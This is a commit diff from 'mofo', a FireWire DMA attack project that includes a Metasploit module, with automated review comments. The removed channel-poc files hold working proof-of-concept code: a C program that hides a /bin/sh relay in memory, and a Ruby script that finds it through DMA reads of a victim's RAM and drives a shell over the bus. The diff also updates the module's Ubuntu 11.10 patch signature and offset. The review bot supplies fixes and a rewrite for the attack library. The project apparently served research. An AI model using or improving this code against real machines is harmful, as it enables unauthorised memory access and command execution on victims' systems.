
Added rough installation instructions

Removed some unused files
removed fu
1 parent 86761d7 commit 895172cadeebe2f81372310620dfa21c113d084d dma committed Apr 13, 2012
Showing with 63 additions and 262 deletions.
  1. +3 −3 README
  2. +0 −102 channel-poc/channel.c
  3. +0 −119 channel-poc/channel.rb
  4. +0 −11 channel-poc/spam.c
  5. +56 −25 forensic1394/device.rb
  6. +4 −2 module/mofo.rb
6 README
@@ -7,7 +7,7 @@ An explanation of our work can be found in our paper: "mofo-final.pdf".
#### INSTALLATION INSTRUCTIONS ####
#install prerequisites
-sudo apt-get install cmake
+sudo apt-get install cmake git build-essential
# Fetch, build and install libforensic1394
git clone git://git.freddie.witherden.org/forensic1394.git
@@ -20,8 +20,8 @@ cd ..
# install ffi gem
#TODO: there has got to be a better way
sudo apt-get install ruby1.9.1-dev
-gem1.9.1 install ffi
-cp -r /var/lib/gems/1.9.1/gems/ffi-1.0.11 /opt/metasploit-4.1.4/ruby/lib/ruby/gems/1.9.1/gems/
+sudo gem1.9.1 install ffi
+sudo cp -r /var/lib/gems/1.9*/gems/ffi-1* /opt/metasploit-4*/ruby/lib/ruby/gems/1.9*/gems/
# install mofo
git clone git@github.com:mrbreaker/mofo.git
102 channel-poc/channel.c
@@ -1,102 +0,0 @@
-#include <sys/mman.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <stdbool.h>
-#include <unistd.h>
-#include <fcntl.h>
-#include <errno.h>
-
-#pragma pack(1)
-
-#define BUFFER_SIZE 255
-#define PATTERN_SIZE 16
-#define CACHE_SIZE ( 10 * 1024 * 1024 )
-#define SEND_MASTER '^'
-#define SEND_SLAVE '~'
-
-struct msg {
- char pattern[PATTERN_SIZE];
- volatile char flags;
- volatile unsigned char len;
- char data[BUFFER_SIZE];
-};
-typedef struct msg message;
-
-message* initMessage(){
- int i;
- message *p;
-
- p = mmap(NULL,sizeof(message),PROT_WRITE|PROT_READ,MAP_PRIVATE|MAP_ANONYMOUS,-1,0);
- if(p == (void*)-1)
- puts("mmap failed");
-
- memcpy(p->pattern,"81d2ec67g412df64",PATTERN_SIZE);
-
- for(i=0;i<PATTERN_SIZE;i++)
- p->pattern[i]-=1;
-
- p->flags = SEND_SLAVE;
- return p;
-}
-
-void blockMessage(message *m){
- while(1)
- if(m->flags != SEND_SLAVE)
- return;
-}
-
-int main(int argc,char **argv){
- int fdstdin[2];
- int fdstdout[2];
- int oldstdin;
- int oldstdout;
- message* m;
- m = initMessage();
- if(pipe(fdstdin))
- perror("creating pipe failed");
-
- if(pipe(fdstdout))
- perror("creating pipe failed");
-
- fcntl(fdstdin[0],F_SETFL,O_NONBLOCK);
- fcntl(fdstdin[1],F_SETFL,O_NONBLOCK);
- fcntl(fdstdout[0],F_SETFL,O_NONBLOCK);
- fcntl(fdstdout[1],F_SETFL,O_NONBLOCK);
-
- oldstdin=dup(fileno(stdin));
- close(fileno(stdin));
-
- oldstdout=dup(fileno(stdout));
- close(fileno(stdout));
-
- dup2(fdstdin[0], fileno(stdin));
- dup2(fdstdout[1], fileno(stdout));
-
- if(fork()){
- //parent
- dup2(oldstdin, fileno(stdin));
- dup2(oldstdout, fileno(stdout));
-
- while(1){
- int len;
- blockMessage(m);
- write(fdstdin[1], m->data, m->len);
- write(fileno(stdout), m->data, m->len);
- if ((len = read(fdstdout[0], m->data, BUFFER_SIZE)) == -1)
- m->len = 0;
- else
- m->len = len;
-
- m->flags = SEND_SLAVE;
- puts ("###################################");
- }
- }else{
- //child
- char *args = NULL;
- dup2(fileno(stdout), fileno(stderr));
- execvp("/bin/sh",&args);
- }
- return 0;
-}
-
119 channel-poc/channel.rb
@@ -1,119 +0,0 @@
-#!/usr/bin/env ruby
-require '../forensic1394/bus'
-require 'pp'
-require 'fcntl'
-
-
-def run(context)
- # first 17 characters of md5sum of awesome with the 9 removed
- sig = "70c1db56f301ce55"
- off = 0x00
-
- # Print phase, method and patch parameters
- puts ' Using signature: %s' % sig
- puts ' Using offset: %x' % off
-
- # Initialize
- d = initialize_fw(d)
-
- # Find memory size
- puts 'Detecting memory size...'
- memsize = 4 * 1024 * 1024 * 1024
- puts '%d MiB main memory detected' % (Integer(memsize)/(1024 * 1024))
-
- # Attack
- puts 'Starting attack...'
- begin
- # Find
- addr = findsig(d, sig, off, memsize)
- if !addr
- settings.success = False
- else
- puts '+ Signature found at 0x%x.' % addr
- while (1)
- data = ''
- begin
- STDIN.flush
- data = STDIN.read_nonblock(255)
- rescue
- data = ''
- end
- d.write(addr + 18, data)
- d.write(addr + 17, sprintf("%c", data.length))
- d.write(addr + 16, '^')
- while (d.read(addr + 16, 1) != '~')
- sleep(1)
- end
- len = d.read(addr + 17, 1)
- data = d.read(addr + 18, len.ord)
- print data
- end
- end
- rescue IOError => e
- success = false
- puts '-', 'I/O Error, make sure FireWire interfaces are properly connected.'
- puts e.message
- end
-
- if !success
- fail('Failed to dump.')
- end
-
-
- if not settings.success
- fail('Signature not found.')
- end
-end
-
-def initialize_fw(d)
- b = Bus.new
- # Enable SBP-2 support to ensure we get DMA
- b.enable_sbp2()
-
- begin
- for i in 3.downto(1)
- puts "[+] Initializing bus and enabling SBP2, please wait %2d seconds or press Ctrl+C \r" % i;
- STDOUT.flush
- sleep(1)
- end
- rescue
- puts 'Interrupted'
- end
-
- # Open the first device
- d = b.devices
-
- if (d.length > 0)
- d = d[0]
- d.open()
- puts ''
- else
- raise 'nothing connected'
- end
-
- return d
-end
-
-def findsig(d, sig, off, memsize)
- pagesize = 4096
- one_mb = 1 * 1024 * 1024
- for addr in (one_mb + off..memsize).step(pagesize)
- data = d.read(addr, sig.length)
- if (data == sig)
- return addr
- end
- end
- print()
- return
-end
-
-def fail(msg)
- puts "\n [!] Attack unsuccessful."
- puts msg
- exit
-end
-
-if __FILE__ == $0
- run( ARGV )
-end
-
11 channel-poc/spam.c
@@ -1,11 +0,0 @@
-#include <string.h>
-#include <stdlib.h>
-
-int main(int argc,char** argv){
- char *ptr;
- char i;
- for(;;i++){
- ptr = malloc(16);
- memset(ptr,i,16);
- }
-}
81 forensic1394/device.rb
@@ -49,7 +49,7 @@ def initialize (bus, devptr)
@vendor_id = Forensic1394.get_device_vendor_id(@devptr)
@request_size = Forensic1394.get_device_request_size(@devptr)
- @csr = FFI::Buffer.new(4, 256, true)
+ @csr = FFI::MemoryPointer.new(4, 256, true)
Forensic1394.get_device_csr(@devptr, @csr)
end
@@ -68,7 +68,7 @@ def setStale(stale)
# device is stale, an exception raised.
def open
- checkStale()
+ checkStale
process_result(Forensic1394.open_device(@devptr), 'Forensic1394.open_device')
end
@@ -85,7 +85,7 @@ def close
# Checks to see if the device is open or not, returning a boolean value.
# In the case of a stale handle false is returned.
- def isOpen
+ def isopen
if @stale
return false
else
@@ -98,18 +98,55 @@ def isOpen
# The device must be open and the handle can not be stale.
# Requests larger than @request_size will automatically be
# broken down into smaller chunks. The resulting data is
- # returned.
+ # returned. An exception is raised should an error occur. The
+ # optional buf parameter can be used to pass a specific ctypes
+ # c_char array to read into. If no buffer is passed then
+ # create_string_buffer will be used to allocate one.
- def read (addr, numb)
+ def read (addr, numb, buf=nil)
+ if buf == nil
+ # No buffer passed; allocate one
+ buf = FFI::MemoryPointer.new(1, numb, true)
+ else
+ raise "IMPLEMENT ME"
+ end
+
# Break the request up into rs size chunks; if numb % rs = 0 then
# lens may have an extra element; zip will take care of this
rs = @request_size
addrs = (addr..addr + numb).step(rs)
lens = [rs] * (Integer(numb) / Integer(rs)) + [numb % rs]
- return readreq(addrs.zip(lens))
- #buf = FFI::Buffer.new(1, numb, true)
- #readreq(addrs.zip(lens), buf)
- #return buf.get_bytes(0,numb)
+ readreq(addrs.zip(lens), buf)
+ return buf.get_bytes(0,numb)
+ end
+
+ ##
+ # Performs a batch of read requests of the form: [(addr1, len1),
+ # (addr2, len2), ...] and returns a generator yielding, in
+ # sequence, (addr1, buf1), (addr2, buf2), ..., . This is useful
+ # when performing a series of `scatter reads' from a device.
+
+ def readv (req)
+ checkStale()
+ # Create the request buffer
+ sum = 0
+ for addr, numb in req
+ sum += numb
+ end
+ buf = FFI::MemoryPointer.new(1, sum, true)
+
+ # Use readreq to read the requests into buf
+ readreq(req, buf)
+
+ # Generate the resulting buffers
+ off = 0
+ answers = []
+ for addr, numb in req
+ answers << [[addr, buf.get_pointer(off)]]
+ off += numb
+ end
+
+ return answers
end
##
@@ -119,7 +156,7 @@ def read (addr, numb)
# chunks. Uses writev internally.
def write (addr, buf)
- checkStale()
+ checkStale
# Break up the request
req = []
(0..buf.size).step(@request_size) do |off|
@@ -135,16 +172,15 @@ def write (addr, buf)
def writev (req)
checkStale()
- if isOpen() == 0
+ if isopen() == 0
raise "Forensic1394Exception", "not open"
end
# Prepare the request array(addr, len, buf)
for addr, buf in req
creq = Forensic1394::Req.new()
- b = FFI::MemoryPointer.new(:char,buf.size);
- b.write_array_of_char(buf.to_s)
-
+ b = FFI::MemoryPointer.new(1, buf.size, true)
+ b.put_bytes(0, buf.to_s)
creq[:addr]=addr
creq[:len]=buf.size
creq[:buf]= b
@@ -215,29 +251,24 @@ def csr
##
# Internal low level read function.
- def readreq(req)
- if isOpen() == 0
+ def readreq (req, buf)
+ if isopen() == 0
raise Forensic1394Exception, "not open"
end
+ # Create the request tuples
off = 0
- buf = ""
for addr, numb in req
- #set up the struct for passing
creq = Forensic1394::Req.new
creq[:addr] = addr
creq[:len]=numb
-
- b = FFI::MemoryPointer.new(:char,numb)
- creq[:buf]= b
-
- # Dispatch the request
+ creq[:buf]= buf.slice(off, numb)
+
+ # Dispatch the requests
status = Forensic1394.read_device_v(@devptr, creq, 1)
- buff += b.read_array_of_char()
process_result(status, "Forensic1394.read_device_v")
off += numb
end
- return buff
end
end
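Review bot: `buf.get_pointer(off)` in the new readv does not give a pointer into buf at offset off; FFI's get_pointer reads the machine word stored at that offset and wraps it as an address, so each answer carries a Pointer whose target is whatever bytes the device returned rather than a view of the data, and `answers << [[addr, ...]]` adds a second level of nesting so the result is `[[[addr, ptr]], ...]` instead of the documented `(addr, buf)` pairs. The slice form that readreq already uses, `buf.slice(off, numb)`, is the right view, and since the method builds and returns an Array rather than a generator the comment above it should say so; a rewrite is below. The guard `if isopen() == 0` in writev and readreq (and the `isOpen` it replaces) can never be true because isopen returns true/false and `false == 0` is false in Ruby, so the not-open check is dead, and `raise "Forensic1394Exception", "not open"` in writev would raise TypeError (a String is not an exception class) if it were ever reached; `raise Forensic1394Exception, "not open" unless isopen` fixes both. The new read doc comment describes a "ctypes c_char array" and "create_string_buffer", which are Python terms with no counterpart in this file, while the buf path it documents is `raise "IMPLEMENT ME"`; document the parameter as an FFI::MemoryPointer and either implement it or drop it. readv also keeps `checkStale()` where the open and write hunks in this same commit drop the parentheses.
```ruby
  def readv (req)
    checkStale
    # One backing buffer for the whole batch; each answer is a window into it
    total = req.inject(0) { |sum, (_addr, numb)| sum + numb }
    buf = FFI::MemoryPointer.new(1, total, true)
    readreq(req, buf)
    off = 0
    req.map do |addr, numb|
      view = buf.slice(off, numb)
      off += numb
      [addr, view]
    end
  end
```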
6 module/mofo.rb
@@ -29,7 +29,9 @@ def initialize(info = {})
'Arch' => ARCH_X86,
'Targets' =>
[
- [ 'Ubuntu 11.10', { 'Offset' => 0x540, 'Signature' => "\x74\x1e\x89\x5c\x24\x04\xc7\x04\x24\x70\x73\x05\x08\xe8\x3e\x53\xff\xff\x83\xc4\x24\x31\xc0\x5b\x5e", 'Space' => 75 } ],
+ [ 'Ubuntu 11.10', { 'Offset' => 0x590, 'Signature' =>
+ # "\x74\x1e\x89\x5c\x24\x04\xc7\x04\x24\x70\x73\x05\x08\xe8\x3e\x53\xff\xff\x83\xc4\x24\x31\xc0\x5b\x5e", 'Space' => 75 } ],
+ "\x74\x1e\x89\x5c\x24\x04\xc7\x04\x24", 'Space' => 75 } ],
# [ 'Ubuntu 11.10', { 'Offset' => 0x4f2, 'Signature' => "8B430C8B501C895424048B40", 'Space' => 75 } ],
],
'DefaultTarget' => 0,
@@ -108,7 +110,7 @@ def initialize_fw(b, d)
b.enable_sbp2()
begin
- for i in 3.downto(1)
+ for i in 4.downto(1)
puts "[+] Initializing bus and enabling SBP2, please wait %2d seconds or press Ctrl+C \r" % i;
STDOUT.flush
sleep(1)
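Review bot: The `for i in 4.downto(1)` line on the new side keeps the non-idiomatic `for`, which leaks `i` into the enclosing scope; `4.downto(1) do |i|` is the usual form, and the `begin`/`rescue` block around it continues outside the hunk. In the Targets hunk the previous 25-byte signature is kept as a comment in the middle of the hash literal, where it reads as a stray continuation of the `'Signature' =>` line; git history already preserves it, so either delete the comment or move it above the entry with a one-line reason for the shorter value and the new offset, since that method (`initialize`) also extends beyond the hunk.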
